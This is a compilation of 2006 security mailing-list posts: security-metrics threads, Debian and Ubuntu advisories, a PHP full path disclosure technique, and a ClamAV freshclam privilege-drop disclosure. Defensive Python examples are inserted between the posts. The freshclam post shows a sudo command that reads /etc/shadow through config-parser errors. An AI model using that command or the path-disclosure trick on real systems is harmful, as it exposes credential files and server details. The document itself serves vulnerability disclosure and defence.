Re: How secure is software X?
On Fri, May 12, 2006 at 02:59:17AM +0100, David Litchfield wrote:

    How secure is software X? At least as secure as Vulnerability Assessment Assurance Level P; or Q or R. Well, that's what I think we should be able to say. What we need is an open standard, that has been agreed upon by recognized experts, against which the absence of software security vulnerability can be measured - something which improves upon the failings of the Common Criteria.

The Trike threat modeling methodology has as its goal being able to produce exactly this kind of formal model of software risk -- models which have a high degree of real world relevancy, can be reliably generated by multiple teams, and compared across both different applications and different versions of an application. We're strongest right now on architectural level issues; the further into the details of the implementation, the more complex the model becomes, obviously. That said, formal threat models provide a solid analysis foundation to build on, and can work nicely with either automated test suites or more ad-hoc methods, including heuristics like previous bugs filed, number of code audits, etc.

You can find a bit more at www.octotrike.org, but we've taken some pretty big steps from the work that's documented there.

/P.

-- 
Ideas are my favorite toys.
Re: How secure is software X?
Dear David,

in my opinion a software can either be secure or not secure. I think it's a bit like a woman cannot be a bit pregnant. But the protocol you are talking about can be used to tell the secure from the insecure pieces of software. By applying a test for these rules against systems, security will definitely be enhanced since software brandmarked with "insecure" will simply lose its value.

Another question is how to verify that authors check their own software? If they do not do it by now, why then? The only reason I could imagine would be a raise in value by being able to say "My software is a tested 'secure' one".

My 2cts :)

Bye
Fabian Becker
PhpBB <= 2.0.20 Admin/Restore Database remote cmmnds xctn (works with admin sid)
An admin, or whoever succeeds in finding the admin sid, is able to launch commands. Advisory/PoC exploit: http://retrogod.altervista.org/phpbb_2020_admin_xpl.html
RE: Oracle - the last word
I politely disagree... if there are no measurements then there can be no metrics (or is that the other way around? :-) There has to be a start some place; i.e. in your examples, David's time can be recorded to the hour, and even the researcher/analyst could have a rating to compensate for skill difference.

The suggestions/ideas put forth here in this thread are very interesting, IMO. Besides rating a software package solely on the number of vulnerabilities found, it's more accurate to include the time to patch the vulnerability by the vendor, and the time it takes a vendor to respond to a vulnerability report. These 2 factors could get a weighted rating and be combined with the # of vulnerabilities rating, which would be a more accurate assessment of "how safe is software X?". I can think of Windows OS vs. Linux OS, and IE vs. Firefox as perfect examples. Microsoft and its supporters will reference the number (and perhaps the criticality) of vulnerabilities, while not taking into account the patch and response time. Of course, this leads to other possible factors such as a vendor's patch delivery mechanism, but we can't not take on the task just because there isn't an immediate clear solution.

Stephen Evans, CISSP

--- Lee Kelly [EMAIL PROTECTED] wrote:

    Actually I would think this information would be only as good as the person doing the testing, and in fact may lead to a false timeline. To continue using Mr. Litchfield's example consider the following:

    - The bugs (regardless of number) found in a day could have been blatantly obvious;
    - The bugs that took two weeks to find may have been more technically obscure, or it may be that Mr. Litchfield had other things to do rather than spend all his time looking for bugs;
    - From this, and previous postings, I am going to take for granted that Mr. Litchfield is an Oracle expert although we have never met to my knowledge. That being said, how long would it take a novice (or someone less skilled) to find these same bugs. I think even Mr. Litchfield would agree that there are malicious people out there just as expert, maybe even more so, than he is regarding Oracle products.
    - Level of effort also has to take into account when the research started versus when the application/patch/upgrade was released. For example let's say that 10gR2 was released on April 1st (don't actually know, just picking a date) and Mr. Litchfield was on vacation or travel until April 8th. If it then took him two weeks to find these bugs the 'bad guys' will have had a week head start over his research. I understand that more people than Mr. Litchfield are doing this research but this would need to be factored in the equation.

    All this being said -- I am not taking the position that this information would not be 'interesting', but I don't think it would provide a more concrete answer to the question "how secure is software X".

    Thank You,
    Lee Kelly, CISSP

    -----Original Message-----
    From: Steven M. Christey [mailto:[EMAIL PROTECTED]
    Sent: Wednesday, May 10, 2006 6:29 PM
    To: [EMAIL PROTECTED]
    Cc: bugtraq@securityfocus.com
    Subject: Re: Oracle - the last word

    David Litchfield said:

        When Oracle 10g Release 1 was released you could spend a day looking for bugs and find thirty. When 10g Release 2 was released I had to spend two weeks looking to find the same number.

    This increasing level of effort is likely happening for other major widely audited software products, too. It would be a very useful data point if researchers could publicly quantify how much time and effort they needed to find the issues (note: this is not my idea, it came out of various other discussions.) Level of effort might provide a more concrete answer to the question "how secure is software X?" Some researchers might not want to publicize this kind of information, but this would be one great way to help us move away from the primitive practice of counting the number of reported vulnerabilities.

    (and while I'm talking about quantifying researcher effort, it might be highly illustrative to measure how much time is spent in dealing with vendors during disclosure.)

    - Steve
[SECURITY] [DSA 1057-1] New phpLDAPadmin packages fix cross-site scripting
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1057-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
May 15th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : phpldapadmin
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2016
BugTraq ID     : 17643
Debian Bug     : 365313

Several cross-site scripting vulnerabilities have been discovered in phpLDAPadmin, a web based interface for administering LDAP servers, that allows remote attackers to inject arbitrary web script or HTML.

The old stable distribution (woody) does not contain phpldapadmin packages.

For the stable distribution (sarge) these problems have been fixed in version 0.9.5-3sarge3.

For the unstable distribution (sid) these problems have been fixed in version 0.9.8.3-1.

We recommend that you upgrade your phpldapadmin package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge3.dsc
      Size/MD5 checksum:      619 0889400f9f965c338dff4c547ea046cd
    http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge3.diff.gz
      Size/MD5 checksum:    12460 212a8a58288ba85121a0cd3ec86dc284
    http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5.orig.tar.gz
      Size/MD5 checksum:   617707 fb0669d4c4b8857387aef2630de8

  Architecture independent components:

    http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge3_all.deb
      Size/MD5 checksum:   617970 3bb8628eb5ba813c653fe74d56520273

  These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEaI5MW5ql+IAeqTIRAhpCAJwOm1ZSJ6ORdUsYOsO8mTXi/nf3ZgCdGR+Y
L2keerjA1onNQ6yPaDChxwo=
=OtaI
-----END PGP SIGNATURE-----
[USN-274-2] MySQL vulnerability
===========================================================
Ubuntu Security Notice USN-274-2              May 15, 2006
mysql-dfsg vulnerability
CVE-2006-0903
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

mysql-server

The problem can be corrected by upgrading the affected package to version 4.0.23-3ubuntu2.4 (for Ubuntu 5.04), or 4.0.24-10ubuntu2.3 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

USN-274-1 fixed a logging bypass in the MySQL server. Unfortunately it was determined that the original update was not sufficient to completely fix the vulnerability, thus another update is necessary. We apologize for the inconvenience.

For reference, these are the details of the original USN:

  A logging bypass was discovered in the MySQL query parser. A local attacker could exploit this by inserting NUL characters into query strings (even into comments), which would cause the query to be logged incompletely. This only affects you if you enabled the 'log' parameter in the MySQL configuration.

Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.23-3ubuntu2.4.diff.gz
      Size/MD5:   347218 5bf62963f2439449d17429b974dc954e
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.23-3ubuntu2.4.dsc
      Size/MD5:      891 cf807937ea7cb09d1717c562c355e2cd
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.23.orig.tar.gz
      Size/MD5:  9814467 5eec8f66ed48c6ff92e73161651a492b

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-common_4.0.23-3ubuntu2.4_all.deb
      Size/MD5:    32366 1a3bd9d864cae3bfa1987f859b5624aa

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.23-3ubuntu2.4_amd64.deb
      Size/MD5:  2867226 cee7c90e2a0fd2ab3d17ba1b25b74f0d
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12_4.0.23-3ubuntu2.4_amd64.deb
      Size/MD5:   307670 e7fea674e9dcad07d491e70f80aefa77
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-client_4.0.23-3ubuntu2.4_amd64.deb
      Size/MD5:   431800 6b87ceedfa25337da77b1cb0f461526e
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-server_4.0.23-3ubuntu2.4_amd64.deb
      Size/MD5:  3629366 3ae34465083080e3bf9d620f8cb8cb02

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.23-3ubuntu2.4_i386.deb
      Size/MD5:  2827210 8efa7c02567c9728cd915d3c40e5a197
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12_4.0.23-3ubuntu2.4_i386.deb
      Size/MD5:   290266 d922e809d77b6b5dc3b4ed0b60aab4ca
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-client_4.0.23-3ubuntu2.4_i386.deb
      Size/MD5:   405024 b44e2e31c97d7e53fe0c165c8857dae2
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-server_4.0.23-3ubuntu2.4_i386.deb
      Size/MD5:  3538020 3b77c2725479cf9167f0015ab6c84217

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.23-3ubuntu2.4_powerpc.deb
      Size/MD5:  3181320 b9a3a84b59e90cebc93f0a19cc63c9ef
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12_4.0.23-3ubuntu2.4_powerpc.deb
      Size/MD5:   313258 cbcdd0d05906c05ff730b1b75d04c860
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-client_4.0.23-3ubuntu2.4_powerpc.deb
      Size/MD5:   462556 3b7b56ceb6c3698ab404080a0692f5ec
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-server_4.0.23-3ubuntu2.4_powerpc.deb
      Size/MD5:  3840116 63049c52217853f785162ba6d54f133d

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.24-10ubuntu2.3.diff.gz
      Size/MD5:    99812 d274d44f9970d8b2489f2a70b033f77a
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.24-10ubuntu2.3.dsc
      Size/MD5:      966 2f2a9b55283f1d634dce18e558d92ba3
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.24.orig.tar.gz
      Size/MD5:  9923794 aed8f335795a359f32492159e3edfaa3

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-common_4.0.24-10ubuntu2.3_all.deb
      Size/MD5:    35028 a2a4b01f8de78f0489b2fb1563cb5f7a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10ubuntu2.3_amd64.deb
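The logging bypass the notice describes comes down to a logger that treats the query as a C string and stops at the first NUL byte. The following is an added example, not Ubuntu's or MySQL's code, of what a hardened query logger does instead: it renders the query as a length-delimited byte string with control bytes escaped, so nothing after the NUL is lost, and it flags queries that carry bytes no legitimate client sends. The sample queries are constructed.

```python
"""Rendering SQL query strings so a NUL byte cannot truncate the log entry.

Added example, not Ubuntu's or MySQL's code.  USN-274-2 describes a logging
bypass: a NUL byte inside a query (even inside a comment) made the query log
record only the text before that byte, because C string handling stops at
NUL.  A hardened logger treats the query as a length-delimited byte string,
escapes control bytes so nothing is lost, and flags queries containing bytes
no legitimate client sends.
"""

# Constructed sample queries, as raw bytes as received from the client.
SAMPLE_QUERIES = [
    b"SELECT id FROM users WHERE name = 'alice'",
    b"UPDATE users SET role='admin' /* \x00 hidden */ WHERE id = 7",
    b"DELETE FROM audit\x00 WHERE 1=1",
]

# Control bytes that legitimately occur in multi-line SQL: tab, LF, CR.
_ALLOWED_CONTROL = {0x09, 0x0A, 0x0D}


def c_string_view(query: bytes) -> bytes:
    """What a logger relying on C string termination records: the bytes
    before the first NUL.  Shown only to make the truncation visible."""
    end = query.find(b"\x00")
    return query if end < 0 else query[:end]


def escape_for_log(query: bytes) -> str:
    """Render every byte of the query: control bytes become \\xNN, a literal
    backslash is doubled so the escapes stay unambiguous, and the rest is
    decoded as UTF-8 with undecodable bytes also shown as \\xNN."""
    buf = bytearray()
    for b in query:
        if b < 0x20 or b == 0x7F:
            buf += b"\\x%02x" % b
        elif b == 0x5C:
            buf += b"\\\\"
        else:
            buf.append(b)
    return buf.decode("utf-8", errors="backslashreplace")


def has_control_bytes(query: bytes) -> bool:
    """True when the query carries a NUL or another C0 control byte that is
    not whitespace; a detection hook for the log-evasion pattern."""
    return any(b < 0x20 and b not in _ALLOWED_CONTROL for b in query)


def log_line(query: bytes) -> str:
    """The line a hardened query logger writes: the complete text, escaped,
    with a marker when the query looked like a log-evasion attempt."""
    rendered = escape_for_log(query)
    if has_control_bytes(query):
        return "SUSPICIOUS control bytes in query: " + rendered
    return "QUERY: " + rendered


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print("C view :", c_string_view(q))
        print("logged :", log_line(q))
```

Escaping the newline and tab as well keeps one query per log line, which is what makes the log greppable; the detection predicate deliberately exempts those three bytes so ordinary multi-line statements are not flagged.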
Is MS06-018 a DoS or a system compromise ?
There seems to be some confusion in MS Security Bulletin MS06-018, "Vulnerability in Microsoft Distributed Transaction Coordinator".

The bulletin itself (http://www.microsoft.com/technet/security/bulletin/ms06-018.mspx) states:

    An attacker could cause the Microsoft Distributed Transaction Coordinator (MSDTC) to stop responding. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.

whereas the linked download pages for both the Win2K and WinXP patches

    http://www.microsoft.com/downloads/details.aspx?familyid=8B98F380-0E5C-4B80-9710-95E1B35AFD83&displaylang=en
    http://www.microsoft.com/downloads/details.aspx?familyid=D80B43B2-727B-46B6-82D1-F2CBD916FE32&displaylang=en

state:

    A security issue has been identified in the Microsoft Distributed Transaction Controller service that could allow an attacker to compromise your Windows-based system and gain control over it.

The related McAfee advisory (http://seclists.org/lists/bugtraq/2006/May/0215.html) states:

    Exploitation can at most lead to a denial of service and therefore the risk factor is at medium.

so I guess DoS is what it is ... but it would still be nice if someone in the know could confirm the download pages are wrong. Anyone from Microsoft here?

Cheers
Nick Boyce
-- 
One way to make your old car run better is to look up the price of a new model.
JDK 1.4.2_11, 1.5.0_06, unsigned applets consuming all free harddisk space
Hi y'all,

Quite a while ago I was testing with applets and found this by accident. It is definitely not a big issue, but worth mentioning, as I discovered that an applet was eating up all the free space on the harddrive by allocating a large file in the user's hidden temp dir (filename is something like +~JF57558.tmp). Even when leaving the page the applet continues to work due to the broken event management between the browser and the JVM, and after quitting the browser the temp file is not deleted. Therefore it leaves the machine in a terrible state, with no available space left, necessary for automatic security updates. And I am just transferring zero bytes but more harmful payload is certainly possible.

Java is supposed to work similarly on all platforms (write once, crash everywhere :-). So please tell me whether the following link fills up your hard disk (use at your own RISK, of course):

http://www.illegalaccess.org/exploit/FullDiskApplet.html

I tested with Firefox 1.5.0.3 and JDK 1.4.2_11 on a WinXP box and on another XP machine with IE6, JDK 1.5.0_06. But I doubt that Sun will ever fix the bug, as they have known about the issue since 2004.

Cheers
Marc
Re: PHPBB 2.0.20 persistent issues with avatars
On 12 May 2006 [EMAIL PROTECTED] wrote:

    (3) inject some php code inside jpeg files as EXIF metadata content: this, in combination with third party vulnerable code can be used to compromise the server where PHP is installed. Should be enough to check for php code inside the temporary files before copying the new avatar into the images/avatars/ folder.

I'd sure love to see the POC on this one. PHP by default needs exif to be enabled during installation in order to work with the image meta data. So in theory not enabling exif should cause this to be benign. With that said, do you have a POC?

sources:
http://www.zend.com/manual/ref.exif.php
http://us2.php.net/exif
http://www.php.net/image

-- 
Paul Laudanski, Microsoft MVP Windows-Security
Submit phish: http://castlecops.com/pirt
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com
[family] http://cuddlesnkisses.com
90% of programs made in PHP5 and prior Full Path Disclosure vuln.
:Introduction:

Normally one of the last steps when accessing a web-server is to find the url where the web is installed (more common in RFD). This may be a hard step, if the RPD is the only bug in that server, but PHP programs have functions that unexpectedly can return lots of errors.

ATTENTION: This is a design error made by the programmers of the affected php programs; the PHP language by itself is safe.

***

Normally a Full Path Disclosure is not dangerous, but in this case 90% of the programs written in PHP are vulnerable. This is a list of 21 tested programs, in their last release at 13/05/06; 19 are vulnerable:

- paFileDB     - Affected
- PhpWiki      - Affected (GET Data)
- CuteNews     - Affected (GET Data)
- SMF          - Affected (GET POST COOKIE)
- phpBB        - Not Affected
- phpNuke      - Affected
- myBB         - Affected (POST Data)
- phpMyAdmin   - Affected
- PHProxy      - Affected (Cookie Post Data)
- phpSurveyor  - Affected
- vBulletin    - Affected (POST Data)
- PunBB        - Affected (POST Data)
- XMB          - Affected (just some files)
- IPB          - Not Affected (some cases)
- Quick Forum  - Affected
- FreeScene    - Affected (POST Data)
- EBB          - Affected (just some files)
- tinyBB       - Affected (no filters xD)
- SciELO       - Affected (GET Data)
- XOOPS        - Affected (POST Data)
- SquirrelMail - Affected

The design error AMAZINGLY USED is when you pass an Array into a function that expects a STRING. The main bug in PHP found was: PHPSESSID *or equivalent* equal to a null-array. When calling the function session_start(); it will return an error like:

    Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /%path%/test.php on line 3

** NOTE ** This error also appears when calling with no value (that also bypasses filters).

This will also bypass all cleaning functions such as:
- htmlentities
- urlencode
- etc..
returning an "expecting T_STRING" error.

:Solution:

The only way to detect it is to add to your filter the condition is_array(). Also, you have to clean with this all parameters incoming from $_REQUEST (cookie, get and post).

:Other Solution:

Disabling all errors and warnings in php.ini

:Dangerous?:

No, but a Path Disclosure can reveal sensitive information.

:Impact:

The path may contain the username of the account, included files and paths, version of software, drive where the web is installed, etc..

:Note:

I repeat. THIS IS NOT DANGEROUS, it's only an additional help you are giving to hackers that already have access to your server.

:Research made by:
sirdarckcat
elhacker.net
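The is_array() gate the post recommends is easy to state and easy to apply inconsistently, since PHP builds the array from the request before any script code runs. The following is an added example, not sirdarckcat's code nor any of the listed projects', that reconstructs the parameter map the way PHP populates $_GET from `name[]=` and `name[key]=` pairs, then puts every parameter read behind the array check and validates the session id against the charset the warning quotes (a-z, A-Z, 0-9). The helper names and the query strings are constructed for the example.

```python
"""Rejecting array-typed request parameters before they reach string functions.

Added example; not sirdarckcat's code nor any of the listed PHP projects'.
PHP turns `name[]=...` or `name[key]=...` request parameters into arrays, and
handing such an array to a function that expects a string (session_start()
via PHPSESSID, htmlentities, urlencode) produces a warning that discloses the
script's absolute path.  This module builds the parameter map the way PHP
populates $_GET, applies the is_array()-style gate to every parameter read,
and validates the session id against the charset quoted in the warning.
"""
import re
from urllib.parse import unquote_plus

_ARRAY_KEY = re.compile(r"^([^\[]+)\[([^\]]*)\]$")   # name[] or name[key]
_SESSION_ID = re.compile(r"^[A-Za-z0-9]+$")         # charset from the PHP warning


def parse_query_php_style(raw: str) -> dict:
    """Approximate PHP's $_GET construction: 'n[]=v' appends at the next
    integer index, 'n[k]=v' stores under key k, anything else is a scalar."""
    params = {}
    for pair in raw.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        key, value = unquote_plus(key), unquote_plus(value)
        m = _ARRAY_KEY.match(key)
        if not m:
            params[key] = value
            continue
        name, sub = m.group(1), m.group(2)
        bucket = params.get(name)
        if not isinstance(bucket, dict):      # scalar earlier, array now: last one wins
            bucket = params[name] = {}
        if sub == "":
            ints = [k for k in bucket if isinstance(k, int)]
            sub = max(ints) + 1 if ints else 0
        bucket[sub] = value
    return params


class BadParameter(ValueError):
    """Raised by the gate instead of letting an array reach a string function."""


def is_array_param(params: dict, name: str) -> bool:
    """The is_array() check from the post's solution."""
    return isinstance(params.get(name), (dict, list))


def scalar_param(params: dict, name: str, default=None):
    """Read a parameter that must be a string; an array is rejected with a
    controlled error rather than passed on to produce a PHP warning."""
    if is_array_param(params, name):
        raise BadParameter("parameter %r must be a string, got array" % name)
    return params.get(name, default)


def session_id_from_request(params: dict, cookies: dict):
    """Return a validated session id, or None when absent or malformed.  Both
    sources are gated, so an array in either never reaches session_start()."""
    sid = scalar_param(params, "PHPSESSID") or scalar_param(cookies, "PHPSESSID")
    if not sid or not _SESSION_ID.match(sid):
        return None
    return sid


if __name__ == "__main__":
    req = parse_query_php_style("PHPSESSID[]=&page=3")     # constructed request
    print(req, is_array_param(req, "PHPSESSID"))
    print(session_id_from_request({}, {"PHPSESSID": "deadbeef"}))
```

Returning None for a malformed id and letting the application start a fresh session is the controlled path; the point of the gate is that the decision is made by the script with its own error handling, not by the interpreter's warning machinery.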
[SECURITY] [DSA 1056-1] New webcalendar packages fix information leak
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1056-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
May 15th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : webcalendar
Vulnerability  : verbose error message
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2247
Debian Bug     : 366927

David Maciejak noticed that webcalendar, a PHP-Based multi-user calendar, returns different error messages on login attempts for an invalid password and a non-existing user, allowing remote attackers to gain information about valid usernames.

The old stable distribution (woody) does not contain a webcalendar package.

For the stable distribution (sarge) this problem has been fixed in version 0.9.45-4sarge4.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your webcalendar package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge4.dsc
      Size/MD5 checksum:      610 1a88e45355b0ca1a474eba42ac6c8eb4
    http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge4.diff.gz
      Size/MD5 checksum:    12135 a518268d52b8a4744dd31ae9a7b60d0c
    http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz
      Size/MD5 checksum:   612360 a6a66dc54cd293429b604fe6da7633a6

  Architecture independent components:

    http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge4_all.deb
      Size/MD5 checksum:   629232 c83c6d64bf495a79cc6fad26b68708e0

  These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEaCXLW5ql+IAeqTIRAh9tAJ0ZOz5tDBmHuzvuyEuAOzY/+mk3ewCfW+SP
2fZR6yXTqQhElPBJ2OL3qUI=
=GjbC
-----END PGP SIGNATURE-----
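The webcalendar issue is the classic username-enumeration oracle: the login code answers "no such user" and "wrong password" differently. The following is an added example, not webcalendar's code, of the fix pattern: a single failure message for both cases, and the same password-hashing work done whether or not the user exists, so neither the text nor the response time tells the two apart. The user store, salts and passwords are constructed.

```python
"""Uniform login failure responses.

Added example; not webcalendar's code.  DSA 1056-1 describes distinct error
messages for "wrong password" and "no such user", which lets a remote party
confirm valid usernames.  The hardened version returns one message for both
cases and performs the same password verification work on both paths, so
neither the text nor the timing distinguishes an unknown user from a wrong
password.  User store, salts and passwords are constructed.
"""
import hashlib
import hmac

ITERATIONS = 50_000
GENERIC_FAILURE = "Invalid username or password"


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


# Constructed user store: username -> (salt, password hash)
_SALT_ALICE = b"constructed-salt-alice"
USERS = {"alice": (_SALT_ALICE, hash_password("correct horse", _SALT_ALICE))}

# A fixed dummy record so unknown usernames cost exactly as much as known ones.
_DUMMY_SALT = b"constructed-dummy-salt"
_DUMMY_HASH = hash_password("dummy-password-never-matches", _DUMMY_SALT)


def login_leaky(username: str, password: str):
    """The pattern the advisory describes: a different message per failure
    cause, and no hashing at all when the user does not exist."""
    rec = USERS.get(username)
    if rec is None:
        return (False, "No such user")
    salt, expected = rec
    if not hmac.compare_digest(hash_password(password, salt), expected):
        return (False, "Wrong password")
    return (True, "OK")


def login_uniform(username: str, password: str):
    """Hardened: one message, and the same hashing work on both failure paths."""
    rec = USERS.get(username)
    salt, expected = rec if rec is not None else (_DUMMY_SALT, _DUMMY_HASH)
    ok = hmac.compare_digest(hash_password(password, salt), expected)
    if rec is None:
        ok = False   # the dummy record must never authenticate, whatever was typed
    return (ok, "OK" if ok else GENERIC_FAILURE)


if __name__ == "__main__":
    for user, pw in (("bob", "x"), ("alice", "x"), ("alice", "correct horse")):
        print(user, login_leaky(user, pw), login_uniform(user, pw))
```

The `ok = False` override is what makes the dummy record safe even if someone learns its password: it equalises the cost of the two paths without ever being a credential.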
DMA[2006-0514a] - 'ClamAV freshclam incorrect privilege drop'
DMA[2006-0514a] - 'ClamAV freshclam incorrect privilege drop'

Author: Kevin Finisterre
Vendor: http://www.clamav.net
Product: 'ClamAV freshclam'
References:
  http://www.digitalmunition.com/DMA[2006-0514a].txt
  http://www.markallan.co.uk/clamXav/

Description:

Tomasz Kojm of the ClamAV team describes the following code snippet from freshclam as being "for system administrators who know what they're doing".

    /* parse the config file */
    if((cfgfile = getargl(opt, "config-file"))) {
        copt = getcfg(cfgfile, 1);
    }
    ...
    if(setgid(user->pw_gid)) {
        logg("^setgid(%d) failed.\n", (int) user->pw_gid);
        exit(61);
    }
    if(setuid(user->pw_uid)) {
        logg("^setuid(%d) failed.\n", (int) user->pw_uid);
        exit(61);
    }

Tomasz feels that since [there are] no problem[s] in freshclam, making any changes to the above code would have "... no real sense from a security point of view". My views on the other hand are slightly different. The above code snippet was obviously put in place to control the uid with which the freshclam binary runs. The freshclam manual page even makes a blatant claim that freshclam will drop privileges.

    freshclam(1)                 Clam AntiVirus                 freshclam(1)

    NAME
           freshclam - update virus databases
    ...
           -u USER, --user USER
                  Run as USER. By default (when started by root) freshclam
                  drops privileges and works as the 'clamav' user.

For a program that currently has no problems the ClamAV authors have certainly gone to odd lengths to make sure that freshclam and apparently its sister programs do not get run with root privs. Tomasz aptly pointed out to me that on page 12 of the ClamAV documentation (http://www.clamav.net/doc/0.88.2/clamdoc.pdf) users are warned to some extent:

    WARNING: Never enable the SUID or SGID bits in Clam AntiVirus binaries.

Given that freshclam should apparently never be run as root I do not exactly get the point of going through the trouble of dropping privs. In the context of complete non privileged use there is no point for the above code at all. It seems as if it should simply be removed.

In the event that you are either A) a user on a system with an administrator that doesn't know what he is doing, B) someone that has gained access to freshclam via sudo or C) a user on a system with clamXav installed, you may notice the following behavior. As you can see freshclam actually does attempt to drop privs for some unknown reason.

    [EMAIL PROTECTED]:~$ sudo freshclam --on-update-execute=/usr/bin/id
    ClamAV update process started at Fri Mar 17 22:41:06 2006
    SECURITY WARNING: NO SUPPORT FOR DIGITAL SIGNATURES
    See the FAQ at http://www.clamav.net/faq.html for an explanation.
    Downloading main.cvd [99%]
    main.cvd updated (version: 36, sigs: 44686, f-level: 7, builder: tkojm)
    Downloading daily.cvd [100%]
    daily.cvd updated (version: 1337, sigs: 1897, f-level: 7, builder: ccordes)
    Database updated (46583 signatures) from database.clamav.net (IP: 67.18.105.98)
    uid=1001(clamav) gid=1002(clamav) groups=1002(clamav)

Unfortunately if you read the man page and *thought* that freshclam *actually* dropped privileges you were completely wrong. It seems that giving a user sudo access to freshclam is a bad idea if you consider the following example.

    [EMAIL PROTECTED]:~$ ls -al /etc/shadow
    -rw-r----- 1 root shadow 797 2006-03-17 22:26 /etc/shadow
    [EMAIL PROTECTED]:~$ cat /etc/shadow
    cat: /etc/shadow: Permission denied

Normally one would not have permission to /etc/shadow, however the shared config parser from freshclam helps spit the contents to the screen in the example, which is being run on a linux machine.

    ./shared/cfgparser.c:303: fprintf(stderr, "ERROR: Parse error at line %d: Unknown option %s.\n", line, name);

    [EMAIL PROTECTED]:~$ sudo freshclam --config-file=/etc/shadow
